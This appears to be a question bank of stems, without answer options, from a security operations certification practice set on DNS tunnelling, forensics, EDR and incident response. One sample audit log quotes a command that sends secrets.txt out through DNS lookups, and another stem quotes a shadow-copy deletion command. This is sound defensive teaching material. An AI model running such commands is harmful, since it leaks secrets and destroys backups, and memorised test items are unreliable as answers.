Security Operations
627 questions
A SOC analyst is reviewing correlated telemetry in a SIEM console following an automated high-severity alert:
[SIEM Alert - Event ID: ALRT-2026-9104]
Rule Name: High-Frequency Outbound Encoded DNS Lookups
Telemetry Digest:
- Timestamp: 2026-07-27T10:14:02Z | SrcIP: 172.16.42.50 | DstIP: 8.8.8.8 | Proto: UDP/53 | Query: a3f9b1c2e4d.data.example-cdn.net | QueryType: TXT | Length: 240 bytes
- Timestamp: 2026-07-27T10:14:03Z | SrcIP: 172.16.42.50 | DstIP: 8.8.8.8 | Proto: UDP/53 | Query: e8d4c1f7a9b.data.example-cdn.net | QueryType: TXT | Length: 244 bytes
- Timestamp: 2026-07-27T10:14:04Z | SrcIP: 172.16.42.50 | DstIP: 8.8.8.8 | Proto: UDP/53 | Query: f9b2e0a1c3d.data.example-cdn.net | QueryType: TXT | Length: 238 bytes
(1,420 similar requests recorded within a 3-minute window)
Host Firewall Logs:
2026-07-27T10:13:58Z ALLOW UDP 172.16.42.50:53124 -> 8.8.8.8:53 (Bypassing internal DNS resolver 172.16.0.2)
Based on the log telemetry, which of the following security events is occurring, and which containment action should be implemented first?
An incident response team is conducting a digital forensics investigation on a compromised virtual database server hosting sensitive records. To ensure evidence admissibility in legal proceedings and maintain proper forensic procedure, the responders must handle volatile data and chain of custody documentation correctly. Which of the following procedures should the incident responders execute to meet these requirements? (Select TWO.)
Select all that apply
A security team is defining an automated containment and investigation workflow for suspicious host behavior flagged by an Endpoint Detection and Response (EDR) agent. Order the steps in the correct chronological sequence from initial detection through remediation.
Drag items to arrange them in the correct order
A Security Operations Center (SOC) analyst is investigating suspicious network activity on an internal Linux host (192.168.1.45) by correlating local audit logs with internal DNS resolver logs:
[DNS Resolver Logs]
2026-07-27T14:02:11.104Z client 192.168.1.45 query: a3V4b25lbGluZQ.c2VjdXJpdHl0ZXN0.example.com IN TXT
2026-07-27T14:02:11.312Z client 192.168.1.45 query: dGhlcXVpY2ticm93bmZveA.c2VjdXJpdHl0ZXN0.example.com IN TXT
[Linux Audit Log (/var/log/audit/audit.log)]
type=SYSCALL msg=audit(1785160920.412:982): arch=c000003e syscall=59 success=yes exe="/usr/bin/bash"
type=EXECVE msg=audit(1785160920.412:982): argc=3 a0="/usr/bin/bash" a1="-c" a2="base64 -d secrets.txt | nslookup -type=TXT - example.com"
Based on the log telemetry provided, which of the following statements accurately characterize the security incident occurring on the endpoint? (Select TWO.)
Select all that apply
During a complex security incident investigation involving an enterprise storage array hosting virtualized database servers, a forensic investigator must extract and preserve digital evidence for upcoming judicial proceedings. The storage array utilizes volatile write caches mirrored asynchronously across active controller nodes. To preserve evidence integrity and establish an unassailable chain of custody during acquisition, which of the following procedures should the investigator perform first?
An incident response analyst seizes a powered-on smartphone that is suspected of being used in an active data exfiltration incident. To prevent remote wipe commands or external data modification over cellular or Wi-Fi networks while transporting the physical evidence to the forensics laboratory, which of the following is the most appropriate action to take?
A Security Operations Center (SOC) analyst confirms an active security incident involving a critical Linux database server hosting sensitive customer records. An external attacker has established an interactive reverse shell via a web application vulnerability, and an automated script on the system is actively staging database tables into an encrypted archive for exfiltration. The incident response playbook requires halting exfiltration immediately while preserving volatile system memory for subsequent forensic analysis. Which of the following actions should the analyst take FIRST?
During an investigation into a ransomware propagation attempt on a critical enterprise server, a security analyst reviews telemetry captured by an Endpoint Detection and Response (EDR) agent. The EDR telemetry log reveals that an authenticated enterprise database daemon spawned a command-line interpreter, which subsequently executed `vssadmin.exe delete shadows /all /quiet`. The EDR agent's automated response policy immediately terminated the command interpreter and its child sub-processes and placed the endpoint into network isolation, but deliberately allowed the primary database daemon process to continue executing. Which of the following best explains the architectural rationale behind the EDR agent targeting only the child process tree during remediation?
A security analyst is documenting the collection, movement, and storage of a physical storage drive seized during an incident response investigation. Which of the following best describes the primary purpose of maintaining a formal chain of custody log throughout this process?
An analyst is defining an automated incident response playbook within an Endpoint Detection and Response (EDR) system to handle high-severity malware execution alerts on enterprise workstations. Place the following steps of the automated containment, analysis, and recovery workflow in the correct chronological order from first to last.
Drag items to arrange them in the correct order
Place the following steps of an Endpoint Detection and Response (EDR) automated containment and incident investigation workflow in the correct sequential order from initial event detection to host restoration.
Drag items to arrange them in the correct order
A security administrator notices that a host security tool generated an alert for an obfuscated script running directly out of system memory using a built-in operating system utility, despite no known file hashes being flagged. Which of the following capabilities best explains why an Endpoint Detection and Response (EDR) agent can identify this suspicious activity?
Security operations analysts respond to an active incident involving a compromised Linux database server running on an enterprise hypervisor. Network telemetry reveals memory-injected malware executing encrypted outbound command-and-control communication. The evidence gathered must be admissible in court for potential legal prosecution. Which of the following actions MUST the forensics team take to adhere strictly to the order of volatility and maintain chain of custody integrity? (Select TWO.)
Select all that apply
A security analyst monitoring enterprise systems confirms an active unauthorized access alert on an internal workstation. The compromised workstation is currently transmitting unauthorized network traffic to an external IP address. According to standard incident response lifecycle frameworks, which action should the analyst take immediately after confirming this detection?
During an incident response investigation into an internal identity compromise involving Kerberos ticket forgery (Pass-the-Ticket) across domain-joined assets, an analyst must act quickly. Which of the following actions represent appropriate containment measures to execute prior to moving into the eradication phase? (Select TWO.)
Select all that apply
A forensic analyst is responding to a live incident on a Linux server suspected of executing an active data exfiltration script via open network sockets. The server is powered on and running in memory. To strictly adhere to the Order of Volatility while maintaining cryptographic chain of custody integrity, which of the following actions should the analyst perform first?
A Security Operations Center (SOC) engineering team is designing an enterprise SIEM processing architecture to handle unstructured log streams from hybrid cloud applications, perimeter firewalls, and endpoint agents. In what order should the log processing pipeline execute these stages from initial log retrieval to automated response handling?
Drag items to arrange them in the correct order
A security analyst is investigating a sequence of correlated Windows Event logs displayed in a SIEM dashboard:
text
2026-07-27T10:14:02Z EventID=4625 TargetUser=svc_sql Workstation=FIN-PC01 SubStatus=0xC000006A
2026-07-27T10:14:03Z EventID=4625 TargetUser=svc_sql Workstation=FIN-PC02 SubStatus=0xC000006A
2026-07-27T10:14:05Z EventID=4624 TargetUser=svc_sql Workstation=DC-01 LogonType=3
2026-07-27T10:14:12Z EventID=7045 ServiceName="PSEXESVC" ImagePath="C:\Windows\PSEXESVC.exe"
Based on the log telemetry shown above, which security event is occurring on the network?
During operational monitoring, a Security Operations Center (SOC) analyst identifies unusual Windows Management Instrumentation (WMI) execution on a core Domain Controller, indicating potential credential harvesting. Following the standard NIST SP 800-61 Incident Response Framework, in which chronological sequence should the security team perform the following response procedures?
Drag items to arrange them in the correct order
During security monitoring, a enterprise Security Operations Center (SOC) team identifies unauthorized API requests executed using a compromised service account token within a production container orchestration cluster. Threat intelligence logs reveal that the attacker has already spawned rogue workload pods designed to perform network reconnaissance and attempt lateral movement toward an isolated sensitive database subnet. According to standard NIST incident response frameworks, which of the following actions should the incident response team perform FIRST?